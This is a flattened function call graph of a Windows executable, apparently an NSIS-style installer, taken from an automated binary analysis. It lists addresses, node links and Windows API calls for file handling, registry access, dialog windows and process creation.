3428->3552 3431 4062b9 17 API calls 3432 4037af DeleteFileW 3431->3432 3433 4037bc CopyFileW 3432->3433 3439 40377e 3432->3439 3433->3439 3434 403805 3436 40605d 36 API calls 3434->3436 3435 40605d 36 API calls 3435->3439 3436->3437 3541 4038ad 3437->3541 3438 4062b9 17 API calls 3438->3439 3439->3431 3439->3434 3439->3435 3439->3438 3440 405880 2 API calls 3439->3440 3441 4037f0 CloseHandle 3439->3441 3440->3439 3441->3439 3442->3367 3443->3369 3445 40652b 5 API calls 3444->3445 3447 403347 3445->3447 3446 403351 3446->3374 3447->3446 3448 405b6c 3 API calls 3447->3448 3449 403359 3448->3449 3450 40584b 2 API calls 3449->3450 3451 40335f 3450->3451 3557 405dbc 3451->3557 3561 405d8d GetFileAttributesW CreateFileW 3454->3561 3456 402f1d 3475 402f2d 3456->3475 3562 406297 lstrcpynW 3456->3562 3458 402f43 3459 405bb8 2 API calls 3458->3459 3460 402f49 3459->3460 3563 406297 lstrcpynW 3460->3563 3462 402f54 GetFileSize 3463 403050 3462->3463 3481 402f6b 3462->3481 3564 402e79 3463->3564 3465 403059 3467 403089 GlobalAlloc 3465->3467 3465->3475 3576 403324 SetFilePointer 3465->3576 3466 40330e ReadFile 3466->3481 3575 403324 SetFilePointer 3467->3575 3470 4030bc 3472 402e79 6 API calls 3470->3472 3471 4030a4 3474 403116 31 API calls 3471->3474 3472->3475 3473 403072 3476 40330e ReadFile 3473->3476 3479 4030b0 3474->3479 3475->3380 3478 40307d 3476->3478 3477 402e79 6 API calls 3477->3481 3478->3467 3478->3475 3479->3475 3479->3479 3480 4030ed SetFilePointer 3479->3480 3480->3475 3481->3463 3481->3466 3481->3470 3481->3475 3481->3477 3483 406671 5 API calls 3482->3483 3484 40399b 3483->3484 3485 4039a1 3484->3485 3486 4039b3 3484->3486 3592 4061de wsprintfW 3485->3592 3487 406165 3 API calls 3486->3487 3488 4039e3 3487->3488 3490 403a02 lstrcatW 3488->3490 3492 406165 3 API calls 3488->3492 3491 4039b1 3490->3491 3577 403c5d 3491->3577 3492->3490 3495 405c74 18 API calls 3496 403a34 3495->3496 3497 403ac8 3496->3497 3499 406165 3 API calls 3496->3499 3498 405c74 18 API calls 3497->3498 3500 403ace 3498->3500 3501 403a66 3499->3501 3502 403ade LoadImageW 3500->3502 3503 4062b9 17 API calls 3500->3503 3501->3497 3506 403a87 lstrlenW 3501->3506 3510 405b99 CharNextW 3501->3510 3504 403b84 3502->3504 3505 403b05 RegisterClassW 3502->3505 3503->3502 3509 40140b 2 API calls 3504->3509 3507 403b8e 3505->3507 3508 403b3b SystemParametersInfoW CreateWindowExW 3505->3508 3511 403a95 lstrcmpiW 3506->3511 3512 403abb 3506->3512 3507->3437 3508->3504 3513 403b8a 3509->3513 3515 403a84 3510->3515 3511->3512 3516 403aa5 GetFileAttributesW 3511->3516 3514 405b6c 3 API calls 3512->3514 3513->3507 3517 403c5d 18 API calls 3513->3517 3518 403ac1 3514->3518 3515->3506 3519 403ab1 3516->3519 3520 403b9b 3517->3520 3593 406297 lstrcpynW 3518->3593 3519->3512 3522 405bb8 2 API calls 3519->3522 3523 403ba7 ShowWindow 3520->3523 3524 403c2a 3520->3524 3522->3512 3525 406601 3 API calls 3523->3525 3585 4053d2 OleInitialize 3524->3585 3528 403bbf 3525->3528 3527 403c30 3529 403c34 3527->3529 3530 403c4c 3527->3530 3531 403bcd GetClassInfoW 3528->3531 3533 406601 3 API calls 3528->3533 3529->3507 3536 40140b 2 API calls 3529->3536 3532 40140b 2 API calls 3530->3532 3534 403be1 GetClassInfoW RegisterClassW 3531->3534 3535 403bf7 DialogBoxParamW 3531->3535 3532->3507 3533->3531 3534->3535 3537 40140b 2 API calls 3535->3537 3536->3507 3537->3507 3538->3384 3539->3417 3540->3424 3542 4038c5 3541->3542 3543 4038b7 CloseHandle 3541->3543 3605 4038f2 3542->3605 3543->3542 3546 4059a9 67 API calls 3547 4036e0 OleUninitialize 3546->3547 3547->3393 3547->3394 3549 405912 3548->3549 3550 4036ff ExitProcess 3549->3550 3551 405926 MessageBoxIndirectW 3549->3551 3551->3550 3552->3427 3553->3439 3555 401389 2 API calls 3554->3555 3556 401420 3555->3556 3556->3397 3558 405dc9 GetTickCount GetTempFileNameW 3557->3558 3559 40336a 3558->3559 3560 405dff 3558->3560 3559->3374 3560->3558 3560->3559 3561->3456 3562->3458 3563->3462 3565 402e82 3564->3565 3566 402e9a 3564->3566 3567 402e92 3565->3567 3568 402e8b DestroyWindow 3565->3568 3569 402ea2 3566->3569 3570 402eaa GetTickCount 3566->3570 3567->3465 3568->3567 3571 4066ad 2 API calls 3569->3571 3572 402eb8 CreateDialogParamW ShowWindow 3570->3572 3573 402edb 3570->3573 3574 402ea8 3571->3574 3572->3573 3573->3465 3574->3465 3575->3471 3576->3473 3578 403c71 3577->3578 3594 4061de wsprintfW 3578->3594 3580 403ce2 3595 403d16 3580->3595 3582 403a12 3582->3495 3583 403ce7 3583->3582 3584 4062b9 17 API calls 3583->3584 3584->3583 3598 40425a 3585->3598 3587 4053f5 3591 40541c 3587->3591 3601 401389 3587->3601 3588 40425a SendMessageW 3589 40542e CoUninitialize 3588->3589 3589->3527 3591->3588 3592->3491 3593->3497 3594->3580 3596 4062b9 17 API calls 3595->3596 3597 403d24 SetWindowTextW 3596->3597 3597->3583 3599 404272 3598->3599 3600 404263 SendMessageW 3598->3600 3599->3587 3600->3599 3603 401390 3601->3603 3602 4013fe 3602->3587 3603->3602 3604 4013cb MulDiv SendMessageW 3603->3604 3604->3603 3606 403900 3605->3606 3607 4038ca 3606->3607 3608 403905 FreeLibrary GlobalFree 3606->3608 3607->3546 3608->3607 3608->3608 3648 40176f 3649 402c41 17 API calls 3648->3649 3650 401776 3649->3650 3651 401796 3650->3651 3652 40179e 3650->3652 3687 406297 lstrcpynW 3651->3687 3688 406297 lstrcpynW 3652->3688 3655 40179c 3658 40652b 5 API calls 3655->3658 3656 4017a9 3657 405b6c 3 API calls 3656->3657 3659 4017af lstrcatW 3657->3659 3675 4017bb 3658->3675 3659->3655 3660 4065da 2 API calls 3660->3675 3661 405d68 2 API calls 3661->3675 3663 4017cd CompareFileTime 3663->3675 3664 40188d 3665 4052ff 24 API calls 3664->3665 3666 401897 3665->3666 3669 403116 31 API calls 3666->3669 3667 4052ff 24 API calls 3670 401879 3667->3670 3668 406297 lstrcpynW 3668->3675 3671 4018aa 3669->3671 3672 4018be SetFileTime 3671->3672 3674 4018d0 CloseHandle 3671->3674 3672->3674 3673 4062b9 17 API calls 3673->3675 3674->3670 3676 4018e1 3674->3676 3675->3660 3675->3661 3675->3663 3675->3664 3675->3668 3675->3673 3681 4058fd MessageBoxIndirectW 3675->3681 3685 401864 3675->3685 3686 405d8d GetFileAttributesW CreateFileW 3675->3686 3677 4018e6 3676->3677 3678 4018f9 3676->3678 3679 4062b9 17 API calls 3677->3679 3680 4062b9 17 API calls 3678->3680 3682 4018ee lstrcatW 3679->3682 3683 401901 3680->3683 3681->3675 3682->3683 3684 4058fd MessageBoxIndirectW 3683->3684 3684->3670 3685->3667 3685->3670 3686->3675 3687->3655 3688->3656 4059 4027ef 4060 4027f6 4059->4060 4066 402a70 4059->4066 4061 402c1f 17 API calls 4060->4061 4062 4027fd 4061->4062 4063 40280c SetFilePointer 4062->4063 4064 40281c 4063->4064 4063->4066 4067 4061de wsprintfW 4064->4067 4067->4066 4068 401a72 4069 402c1f 17 API calls 4068->4069 4070 401a7b 4069->4070 4071 402c1f 17 API calls 4070->4071 4072 401a20 4071->4072 3712 401573 3713 401583 ShowWindow 3712->3713 3714 40158c 3712->3714 3713->3714 3715 40159a ShowWindow 3714->3715 3716 402ac5 3714->3716 3715->3716 4073 405273 4074 405283 4073->4074 4075 405297 4073->4075 4077 4052e0 4074->4077 4078 405289 4074->4078 4076 40529f IsWindowVisible 4075->4076 4084 4052b6 4075->4084 4076->4077 4079 4052ac 4076->4079 4080 4052e5 CallWindowProcW 4077->4080 4081 40425a SendMessageW 4078->4081 4086 404bc9 SendMessageW 4079->4086 4082 405293 4080->4082 4081->4082 4084->4080 4091 404c49 4084->4091 4087 404c28 SendMessageW 4086->4087 4088 404bec GetMessagePos ScreenToClient SendMessageW 4086->4088 4089 404c20 4087->4089 4088->4089 4090 404c25 4088->4090 4089->4084 4090->4087 4100 406297 lstrcpynW 4091->4100 4093 404c5c 4101 4061de wsprintfW 4093->4101 4095 404c66 4096 40140b 2 API calls 4095->4096 4097 404c6f 4096->4097 4102 406297 lstrcpynW 4097->4102 4099 404c76 4099->4077 4100->4093 4101->4095 4102->4099 4103 402df3 4104 402e05 SetTimer 4103->4104 4105 402e1e 4103->4105 4104->4105 4106 402e73 4105->4106 4107 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4105->4107 4107->4106 4108 401cf3 4109 402c1f 17 API calls 4108->4109 4110 401cf9 IsWindow 4109->4110 4111 401a20 4110->4111 4112 4014f5 SetForegroundWindow 4113 402ac5 4112->4113 4114 402576 4115 402c41 17 API calls 4114->4115 4116 40257d 4115->4116 4119 405d8d GetFileAttributesW CreateFileW 4116->4119 4118 402589 4119->4118 4120 401b77 4121 401b84 4120->4121 4122 401bc8 4120->4122 4123 4022e4 4121->4123 4129 401b9b 4121->4129 4124 401bf2 GlobalAlloc 4122->4124 4125 401bcd 4122->4125 4127 4062b9 17 API calls 4123->4127 4126 4062b9 17 API calls 4124->4126 4132 401c0d 4125->4132 4141 406297 lstrcpynW 4125->4141 4126->4132 4128 4022f1 4127->4128 4134 4058fd MessageBoxIndirectW 4128->4134 4139 406297 lstrcpynW 4129->4139 4133 401bdf GlobalFree 4133->4132 4134->4132 4135 401baa 4140 406297 lstrcpynW 4135->4140 4137 401bb9 4142 406297 lstrcpynW 4137->4142 4139->4135 4140->4137 4141->4133 4142->4132 3811 4024f8 3812 402c81 17 API calls 3811->3812 3813 402502 3812->3813 3814 402c1f 17 API calls 3813->3814 3815 40250b 3814->3815 3816 402533 RegEnumValueW 3815->3816 3817 402527 RegEnumKeyW 3815->3817 3820 40288b 3815->3820 3818 40254f RegCloseKey 3816->3818 3819 402548 3816->3819 3817->3818 3818->3820 3819->3818 4143 40167b 4144 402c41 17 API calls 4143->4144 4145 401682 4144->4145 4146 402c41 17 API calls 4145->4146 4147 40168b 4146->4147 4148 402c41 17 API calls 4147->4148 4149 401694 MoveFileW 4148->4149 4150 4016a7 4149->4150 4156 4016a0 4149->4156 4152 4065da 2 API calls 4150->4152 4154 402250 4150->4154 4151 401423 24 API calls 4151->4154 4153 4016b6 4152->4153 4153->4154 4155 40605d 36 API calls 4153->4155 4155->4156 4156->4151 4157 404c7b GetDlgItem GetDlgItem 4158 404ccd 7 API calls 4157->4158 4161 404ee6 4157->4161 4159 404d70 DeleteObject 4158->4159 4160 404d63 SendMessageW 4158->4160 4162 404d79 4159->4162 4160->4159 4176 404bc9 5 API calls 4161->4176 4180 404fca 4161->4180 4189 404f57 4161->4189 4163 404db0 4162->4163 4165 4062b9 17 API calls 4162->4165 4166 40420e 18 API calls 4163->4166 4164 405076 4169 405080 SendMessageW 4164->4169 4170 405088 4164->4170 4171 404d92 SendMessageW SendMessageW 4165->4171 4167 404dc4 4166->4167 4172 40420e 18 API calls 4167->4172 4168 404ed9 4174 404275 8 API calls 4168->4174 4169->4170 4181 4050a1 4170->4181 4182 40509a ImageList_Destroy 4170->4182 4186 4050b1 4170->4186 4171->4162 4190 404dd2 4172->4190 4173 405023 SendMessageW 4173->4168 4178 405038 SendMessageW 4173->4178 4179 40526c 4174->4179 4175 404fbc SendMessageW 4175->4180 4176->4189 4177 405220 4177->4168 4187 405232 ShowWindow GetDlgItem ShowWindow 4177->4187 4185 40504b 4178->4185 4180->4164 4180->4168 4180->4173 4183 4050aa GlobalFree 4181->4183 4181->4186 4182->4181 4183->4186 4184 404ea7 GetWindowLongW SetWindowLongW 4188 404ec0 4184->4188 4195 40505c SendMessageW 4185->4195 4186->4177 4200 404c49 4 API calls 4186->4200 4204 4050ec 4186->4204 4187->4168 4191 404ec6 ShowWindow 4188->4191 4192 404ede 4188->4192 4189->4175 4189->4180 4190->4184 4194 404e22 SendMessageW 4190->4194 4196 404ea1 4190->4196 4198 404e5e SendMessageW 4190->4198 4199 404e6f SendMessageW 4190->4199 4208 404243 SendMessageW 4191->4208 4209 404243 SendMessageW 4192->4209 4194->4190 4195->4164 4196->4184 4196->4188 4198->4190 4199->4190 4200->4204 4201 4051f6 InvalidateRect 4201->4177 4202 40520c 4201->4202 4210 404b84 4202->4210 4203 40511a SendMessageW 4207 405130 4203->4207 4204->4203 4204->4207 4206 4051a4 SendMessageW SendMessageW 4206->4207 4207->4201 4207->4206 4208->4168 4209->4161 4213 404abb 4210->4213 4212 404b99 4212->4177 4214 404ad4 4213->4214 4215 4062b9 17 API calls 4214->4215 4216 404b38 4215->4216 4217 4062b9 17 API calls 4216->4217 4218 404b43 4217->4218 4219 4062b9 17 API calls 4218->4219 4220 404b59 lstrlenW wsprintfW SetDlgItemTextW 4219->4220 4220->4212 4221 401e7d 4222 402c41 17 API calls 4221->4222 4223 401e83 4222->4223 4224 402c41 17 API calls 4223->4224 4225 401e8c 4224->4225 4226 402c41 17 API calls 4225->4226 4227 401e95 4226->4227 4228 402c41 17 API calls 4227->4228 4229 401e9e 4228->4229 4230 401423 24 API calls 4229->4230 4231 401ea5 4230->4231 4238 4058c3 ShellExecuteExW 4231->4238 4233 401ee7 4234 406722 5 API calls 4233->4234 4236 40288b 4233->4236 4235 401f01 CloseHandle 4234->4235 4235->4236 4238->4233 4239 40437e lstrlenW 4240 40439d 4239->4240 4241 40439f WideCharToMultiByte 4239->4241 4240->4241 4242 4019ff 4243 402c41 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402c41 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4046ff 4251 40472b 4250->4251 4252 40473c 4250->4252 4311 4058e1 GetDlgItemTextW 4251->4311 4254 404748 GetDlgItem 4252->4254 4260 4047a7 4252->4260 4255 40475c 4254->4255 4259 404770 SetWindowTextW 4255->4259 4263 405c17 4 API calls 4255->4263 4256 40488b 4309 404a3a 4256->4309 4313 4058e1 GetDlgItemTextW 4256->4313 4257 404736 4258 40652b 5 API calls 4257->4258 4258->4252 4264 40420e 18 API calls 4259->4264 4260->4256 4265 4062b9 17 API calls 4260->4265 4260->4309 4262 404275 8 API calls 4267 404a4e 4262->4267 4268 404766 4263->4268 4269 40478c 4264->4269 4270 40481b SHBrowseForFolderW 4265->4270 4266 4048bb 4271 405c74 18 API calls 4266->4271 4268->4259 4275 405b6c 3 API calls 4268->4275 4272 40420e 18 API calls 4269->4272 4270->4256 4273 404833 CoTaskMemFree 4270->4273 4274 4048c1 4271->4274 4276 40479a 4272->4276 4277 405b6c 3 API calls 4273->4277 4314 406297 lstrcpynW 4274->4314 4275->4259 4312 404243 SendMessageW 4276->4312 4279 404840 4277->4279 4282 404877 SetDlgItemTextW 4279->4282 4286 4062b9 17 API calls 4279->4286 4281 4047a0 4284 406671 5 API calls 4281->4284 4282->4256 4283 4048d8 4285 406671 5 API calls 4283->4285 4284->4260 4293 4048df 4285->4293 4287 40485f lstrcmpiW 4286->4287 4287->4282 4289 404870 lstrcatW 4287->4289 4288 404920 4315 406297 lstrcpynW 4288->4315 4289->4282 4291 404927 4292 405c17 4 API calls 4291->4292 4294 40492d GetDiskFreeSpaceW 4292->4294 4293->4288 4297 405bb8 2 API calls 4293->4297 4298 404978 4293->4298 4296 404951 MulDiv 4294->4296 4294->4298 4296->4298 4297->4293 4299 4049e9 4298->4299 4301 404b84 20 API calls 4298->4301 4300 404a0c 4299->4300 4302 40140b 2 API calls 4299->4302 4316 404230 KiUserCallbackDispatcher 4300->4316 4303 4049d6 4301->4303 4302->4300 4305 4049eb SetDlgItemTextW 4303->4305 4306 4049db 4303->4306 4305->4299 4307 404abb 20 API calls 4306->4307 4307->4299 4308 404a28 4308->4309 4310 404658 SendMessageW 4308->4310 4309->4262 4310->4309 4311->4257 4312->4281 4313->4266 4314->4283 4315->4291 4316->4308 4317 401000 4318 401037 BeginPaint GetClientRect 4317->4318 4319 40100c DefWindowProcW 4317->4319 4321 4010f3 4318->4321 4322 401179 4319->4322 4323 401073 CreateBrushIndirect FillRect DeleteObject 4321->4323 4324 4010fc 4321->4324 4323->4321 4325 401102 CreateFontIndirectW 4324->4325 4326 401167 EndPaint 4324->4326 4325->4326 4327 401112 6 API calls 4325->4327 4326->4322 4327->4326 4328 401503 4329 40150b 4328->4329 4331 40151e 4328->4331 4330 402c1f 17 API calls 4329->4330 4330->4331 3297 402484 3308 402c81 3297->3308 3300 402c41 17 API calls 3301 402497 3300->3301 3302 4024a2 RegQueryValueExW 3301->3302 3307 40288b 3301->3307 3303 4024c8 RegCloseKey 3302->3303 3304 4024c2 3302->3304 3303->3307 3304->3303 3313 4061de wsprintfW 3304->3313 3309 402c41 17 API calls 3308->3309 3310 402c98 3309->3310 3311 406104 RegOpenKeyExW 3310->3311 3312 40248e 3311->3312 3312->3300 3313->3303 4332 402104 4333 402c41 17 API calls 4332->4333 4334 40210b 4333->4334 4335 402c41 17 API calls 4334->4335 4336 402115 4335->4336 4337 402c41 17 API calls 4336->4337 4338 40211f 4337->4338 4339 402c41 17 API calls 4338->4339 4340 402129 4339->4340 4341 402c41 17 API calls 4340->4341 4343 402133 4341->4343 4342 402172 CoCreateInstance 4347 402191 4342->4347 4343->4342 4344 402c41 17 API calls 4343->4344 4344->4342 4345 401423 24 API calls 4346 402250 4345->4346 4347->4345 4347->4346 3314 401f06 3315 402c41 17 API calls 3314->3315 3316 401f0c 3315->3316 3317 4052ff 24 API calls 3316->3317 3318 401f16 3317->3318 3329 405880 CreateProcessW 3318->3329 3321 401f3f CloseHandle 3325 40288b 3321->3325 3324 401f31 3326 401f41 3324->3326 3327 401f36 3324->3327 3326->3321 3337 4061de wsprintfW 3327->3337 3330 4058b3 CloseHandle 3329->3330 3331 401f1c 3329->3331 3330->3331 3331->3321 3331->3325 3332 406722 WaitForSingleObject 3331->3332 3333 40673c 3332->3333 3334 40674e GetExitCodeProcess 3333->3334 3338 4066ad 3333->3338 3334->3324 3337->3321 3339 4066ca PeekMessageW 3338->3339 3340 4066c0 DispatchMessageW 3339->3340 3341 4066da WaitForSingleObject 3339->3341 3340->3339 3341->3333 3609 40230c 3610 402314 3609->3610 3612 40231a 3609->3612 3611 402c41 17 API calls 3610->3611 3611->3612 3613 402328 3612->3613 3614 402c41 17 API calls 3612->3614 3615 402336 3613->3615 3616 402c41 17 API calls 3613->3616 3614->3613 3617 402c41 17 API calls 3615->3617 3616->3615 3618 40233f WritePrivateProfileStringW 3617->3618 4348 40190c 4349 401943 4348->4349 4350 402c41 17 API calls 4349->4350 4351 401948 4350->4351 4352 4059a9 67 API calls 4351->4352 4353 401951 4352->4353 4354 401f8c 4355 402c41 17 API calls 4354->4355 4356 401f93 4355->4356 4357 406671 5 API calls 4356->4357 4358 401fa2 4357->4358 4359 402026 4358->4359 4360 401fbe GlobalAlloc 4358->4360 4360->4359 4361 401fd2 4360->4361 4362 406671 5 API calls 4361->4362 4363 401fd9 4362->4363 4364 406671 5 API calls 4363->4364 4365 401fe3 4364->4365 4365->4359 4369 4061de wsprintfW 4365->4369 4367 402018 4370 4061de wsprintfW 4367->4370 4369->4367 4370->4359 3619 40238e 3620 4023c1 3619->3620 3621 402396 3619->3621 3622 402c41 17 API calls 3620->3622 3623 402c81 17 API calls 3621->3623 3624 4023c8 3622->3624 3625 40239d 3623->3625 3631 402cff 3624->3631 3627 4023a7 3625->3627 3629 4023d5 3625->3629 3628 402c41 17 API calls 3627->3628 3630 4023ae RegDeleteValueW RegCloseKey 3628->3630 3630->3629 3632 402d0c 3631->3632 3633 402d13 3631->3633 3632->3629 3633->3632 3635 402d44 3633->3635 3636 406104 RegOpenKeyExW 3635->3636 3637 402d72 3636->3637 3638 402dec 3637->3638 3640 402d76 3637->3640 3638->3632 3639 402d98 RegEnumKeyW 3639->3640 3641 402daf RegCloseKey 3639->3641 3640->3639 3640->3641 3643 402dd0 RegCloseKey 3640->3643 3645 402d44 6 API calls 3640->3645 3642 406671 5 API calls 3641->3642 3644 402dbf 3642->3644 3643->3638 3646 402de0 RegDeleteKeyW 3644->3646 3647 402dc3 3644->3647 3645->3640 3646->3638 3647->3638 4371 40190f 4372 402c41 17 API calls 4371->4372 4373 401916 4372->4373 4374 4058fd MessageBoxIndirectW 4373->4374 4375 40191f 4374->4375 4376 401491 4377 4052ff 24 API calls 4376->4377 4378 401498 4377->4378 4379 401d14 4380 402c1f 17 API calls 4379->4380 4381 401d1b 4380->4381 4382 402c1f 17 API calls 4381->4382 4383 401d27 GetDlgItem 4382->4383 4384 402592 4383->4384 4385 402598 4386 4025c7 4385->4386 4387 4025ac 4385->4387 4388 4025fb 4386->4388 4389 4025cc 4386->4389 4390 402c1f 17 API calls 4387->4390 4392 402c41 17 API calls 4388->4392 4391 402c41 17 API calls 4389->4391 4395 4025b3 4390->4395 4393 4025d3 WideCharToMultiByte lstrlenA 4391->4393 4394 402602 lstrlenW 4392->4394 4393->4395 4394->4395 4396 40262f 4395->4396 4397 402645 4395->4397 4399 405e6e 5 API calls 4395->4399 4396->4397 4398 405e3f WriteFile 4396->4398 4398->4397 4399->4396 4400 40149e 4401 4022f7 4400->4401 4402 4014ac PostQuitMessage 4400->4402 4402->4401 4403 401c1f 4404 402c1f 17 API calls 4403->4404 4405 401c26 4404->4405 4406 402c1f 17 API calls 4405->4406 4407 401c33 4406->4407 4408 401c48 4407->4408 4409 402c41 17 API calls 4407->4409 4410 401c58 4408->4410 4413 402c41 17 API calls 4408->4413 4409->4408 4411 401c63 4410->4411 4412 401caf 4410->4412 4414 402c1f 17 API calls 4411->4414 4415 402c41 17 API calls 4412->4415 4413->4410 4416 401c68 4414->4416 4417 401cb4 4415->4417 4418 402c1f 17 API calls 4416->4418 4419 402c41 17 API calls 4417->4419 4420 401c74 4418->4420 4421 401cbd FindWindowExW 4419->4421 4422 401c81 SendMessageTimeoutW 4420->4422 4423 401c9f SendMessageW 4420->4423 4424 401cdf 4421->4424 4422->4424 4423->4424 4425 402aa0 SendMessageW 4426 402ac5 4425->4426 4427 402aba InvalidateRect 4425->4427 4427->4426 4428 402821 4429 402827 4428->4429 4430 402ac5 4429->4430 4431 40282f FindClose 4429->4431 4431->4430 3241 4015a3 3242 402c41 17 API calls 3241->3242 3243 4015aa SetFileAttributesW 3242->3243 3244 4015bc 3243->3244 4432 4029a8 4433 402c1f 17 API calls 4432->4433 4434 4029ae 4433->4434 4435 4029d5 4434->4435 4436 4029ee 4434->4436 4442 40288b 4434->4442 4439 4029da 4435->4439 4445 4029eb 4435->4445 4437 402a08 4436->4437 4438 4029f8 4436->4438 4441 4062b9 17 API calls 4437->4441 4440 402c1f 17 API calls 4438->4440 4446 406297 lstrcpynW 4439->4446 4440->4445 4441->4445 4445->4442 4447 4061de wsprintfW 4445->4447 4446->4442 4447->4442 4448 4028ad 4449 402c41 17 API calls 4448->4449 4451 4028bb 4449->4451 4450 4028d1 4453 405d68 2 API calls 4450->4453 4451->4450 4452 402c41 17 API calls 4451->4452 4452->4450 4454 4028d7 4453->4454 4476 405d8d GetFileAttributesW CreateFileW 4454->4476 4456 4028e4 4457 4028f0 GlobalAlloc 4456->4457 4458 402987 4456->4458 4459 402909 4457->4459 4460 40297e CloseHandle 4457->4460 4461 4029a2 4458->4461 4462 40298f DeleteFileW 4458->4462 4477 403324 SetFilePointer 4459->4477 4460->4458 4462->4461 4464 40290f 4465 40330e ReadFile 4464->4465 4466 402918 GlobalAlloc 4465->4466 4467 402928 4466->4467 4468 40295c 4466->4468 4470 403116 31 API calls 4467->4470 4469 405e3f WriteFile 4468->4469 4471 402968 GlobalFree 4469->4471 4475 402935 4470->4475 4472 403116 31 API calls 4471->4472 4473 40297b 4472->4473 4473->4460 4474 402953 GlobalFree 4474->4468 4475->4474 4476->4456 4477->4464 4478 401a30 4479 402c41 17 API calls 4478->4479 4480 401a39 ExpandEnvironmentStringsW 4479->4480 4481 401a4d 4480->4481 4483 401a60 4480->4483 4482 401a52 lstrcmpW 4481->4482 4481->4483 4482->4483 3689 402032 3690 402044 3689->3690 3691 4020f6 3689->3691 3692 402c41 17 API calls 3690->3692 3694 401423 24 API calls 3691->3694 3693 40204b 3692->3693 3695 402c41 17 API calls 3693->3695 3700 402250 3694->3700 3696 402054 3695->3696 3697 40206a LoadLibraryExW 3696->3697 3698 40205c GetModuleHandleW 3696->3698 3697->3691 3699 40207b 3697->3699 3698->3697 3698->3699 3709 4066e0 WideCharToMultiByte 3699->3709 3703 4020c5 3705 4052ff 24 API calls 3703->3705 3704 40208c 3706 401423 24 API calls 3704->3706 3707 40209c 3704->3707 3705->3707 3706->3707 3707->3700 3708 4020e8 FreeLibrary 3707->3708 3708->3700 3710 40670a GetProcAddress 3709->3710 3711 402086 3709->3711 3710->3711 3711->3703 3711->3704 3717 403d35 3718 403e88 3717->3718 3719 403d4d 3717->3719 3721 403ed9 3718->3721 3722 403e99 GetDlgItem GetDlgItem 3718->3722 3719->3718 3720 403d59 3719->3720 3723 403d64 SetWindowPos 3720->3723 3724 403d77 3720->3724 3726 403f33 3721->3726 3731 401389 2 API calls 3721->3731 3725 40420e 18 API calls 3722->3725 3723->3724 3728 403d94 3724->3728 3729 403d7c ShowWindow 3724->3729 3730 403ec3 SetClassLongW 3725->3730 3727 40425a SendMessageW 3726->3727 3747 403e83 3726->3747 3753 403f45 3727->3753 3732 403db6 3728->3732 3733 403d9c DestroyWindow 3728->3733 3729->3728 3734 40140b 2 API calls 3730->3734 3735 403f0b 3731->3735 3736 403dbb SetWindowLongW 3732->3736 3737 403dcc 3732->3737 3787 404197 3733->3787 3734->3721 3735->3726 3740 403f0f SendMessageW 3735->3740 3736->3747 3738 403e75 3737->3738 3739 403dd8 GetDlgItem 3737->3739 3797 404275 3738->3797 3743 403e08 3739->3743 3744 403deb SendMessageW IsWindowEnabled 3739->3744 3740->3747 3741 40140b 2 API calls 3741->3753 3742 404199 DestroyWindow EndDialog 3742->3787 3749 403e15 3743->3749 3750 403e5c SendMessageW 3743->3750 3751 403e28 3743->3751 3761 403e0d 3743->3761 3744->3743 3744->3747 3746 4041c8 ShowWindow 3746->3747 3748 4062b9 17 API calls 3748->3753 3749->3750 3749->3761 3750->3738 3754 403e30 3751->3754 3755 403e45 3751->3755 3753->3741 3753->3742 3753->3747 3753->3748 3757 40420e 18 API calls 3753->3757 3778 4040d9 DestroyWindow 3753->3778 3788 40420e 3753->3788 3759 40140b 2 API calls 3754->3759 3758 40140b 2 API calls 3755->3758 3756 403e43 3756->3738 3757->3753 3760 403e4c 3758->3760 3759->3761 3760->3738 3760->3761 3794 4041e7 3761->3794 3763 403fc0 GetDlgItem 3764 403fd5 3763->3764 3765 403fdd ShowWindow KiUserCallbackDispatcher 3763->3765 3764->3765 3791 404230 KiUserCallbackDispatcher 3765->3791 3767 404007 EnableWindow 3771 40401b 3767->3771 3768 404020 GetSystemMenu EnableMenuItem SendMessageW 3769 404050 SendMessageW 3768->3769 3768->3771 3769->3771 3771->3768 3772 403d16 18 API calls 3771->3772 3792 404243 SendMessageW 3771->3792 3793 406297 lstrcpynW 3771->3793 3772->3771 3774 40407f lstrlenW 3775 4062b9 17 API calls 3774->3775 3776 404095 SetWindowTextW 3775->3776 3777 401389 2 API calls 3776->3777 3777->3753 3779 4040f3 CreateDialogParamW 3778->3779 3778->3787 3780 404126 3779->3780 3779->3787 3781 40420e 18 API calls 3780->3781 3782 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3781->3782 3783 401389 2 API calls 3782->3783 3784 404177 3783->3784 3784->3747 3785 40417f ShowWindow 3784->3785 3786 40425a SendMessageW 3785->3786 3786->3787 3787->3746 3787->3747 3789 4062b9 17 API calls 3788->3789 3790 404219 SetDlgItemTextW 3789->3790 3790->3763 3791->3767 3792->3771 3793->3774 3795 4041f4 SendMessageW 3794->3795 3796 4041ee 3794->3796 3795->3756 3796->3795 3798 40428d GetWindowLongW 3797->3798 3799 404338 3797->3799 3798->3799 3800 4042a2 3798->3800 3799->3747 3800->3799 3801 4042d2 3800->3801 3802 4042cf GetSysColor 3800->3802 3803 4042e2 SetBkMode 3801->3803 3804 4042d8 SetTextColor 3801->3804 3802->3801 3805 404300 3803->3805 3806 4042fa GetSysColor 3803->3806 3804->3803 3807 404311 3805->3807 3808 404307 SetBkColor 3805->3808 3806->3805 3807->3799 3809 404324 DeleteObject 3807->3809 3810 40432b CreateBrushIndirect 3807->3810 3808->3807 3809->3810 3810->3799 4489 401735 4490 402c41 17 API calls 4489->4490 4491 40173c SearchPathW 4490->4491 4492 401757 4491->4492 4493 402a35 4494 402c1f 17 API calls 4493->4494 4495 402a3b 4494->4495 4496 402a72 4495->4496 4497 40288b 4495->4497 4499 402a4d 4495->4499 4496->4497 4498 4062b9 17 API calls 4496->4498 4498->4497 4499->4497 4501 4061de wsprintfW 4499->4501 4501->4497 4502 4014b8 4503 4014be 4502->4503 4504 401389 2 API calls 4503->4504 4505 4014c6 4504->4505 4506 4046b8 4507 4046c8 4506->4507 4508 4046ee 4506->4508 4509 40420e 18 API calls 4507->4509 4510 404275 8 API calls 4508->4510 4511 4046d5 SetDlgItemTextW 4509->4511 4512 4046fa 4510->4512 4511->4508 4513 401db9 GetDC 4514 402c1f 17 API calls 4513->4514 4515 401dcb GetDeviceCaps MulDiv ReleaseDC 4514->4515 4516 402c1f 17 API calls 4515->4516 4517 401dfc 